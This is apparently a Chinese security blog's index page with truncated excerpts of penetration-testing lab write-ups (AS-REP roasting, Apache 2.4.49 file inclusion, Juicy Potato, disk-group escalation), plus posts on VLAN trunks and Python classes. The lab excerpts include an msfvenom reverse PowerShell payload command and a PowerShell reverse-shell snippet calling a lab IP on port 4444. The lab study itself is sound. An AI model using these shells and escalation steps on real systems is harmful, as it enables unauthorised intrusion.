zhyann
VLAN原理和VLAN间路由3 配置Trunk
1. 概述配置Trunk时,应先使用port link-type trunk命令修改端口的类型为Trunk,然后再配置Trunk端口允许哪些VLAN的数据帧通过。执行port trunk allow-pass vlan { { vlan-id1 [ to vlan-i...
Forest rpc用户枚举 AS-REP Roasting 域内权限提升
简介ForestDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.161 Windows 1. 信息收集PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerb...
对curl进行URL编码
目标IP为:192.168.174.16web服务器为Apache httpd 2.4.49https://www.exploit-db.com/exploits/50383现在192.168.174.16在cgi-bin有文件包含漏洞 尝试用curl得到/opt/passwordscurl http://192...
disk组提权
https://vk9-sec.com/disk-group-privilege-escalation/?source=post_page-----b14a6e535e1f-------------------------------- 1. 首先查看属于我们组的硬盘ls -l /dev 2. 查看/root属于那个...
DC-6
实验环境攻击者 Kali 192.168.192.128受害者 DC-6 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.171 收集受害者服务详情nmap -sV -A 192.16...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
powershell反弹shell制作
Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...
Exfiltrated
简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE Attack and exfiltrate the target! 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.186.163 Linux 1. 信息...
Sunday 79端口finger服务用户枚举
简介SundayDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.76 Solaris 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.76 --min-rate 10000 -oA Sunday发现一...
Python类 基础
1. 类的定义1.1 设计类在程序中设计表格 我们称之为:设计类(class)class Student: name = None #记录学生姓名class是关键字,表示要定义类了类的属性,即定义在类中的变量(成员变量)类的行为...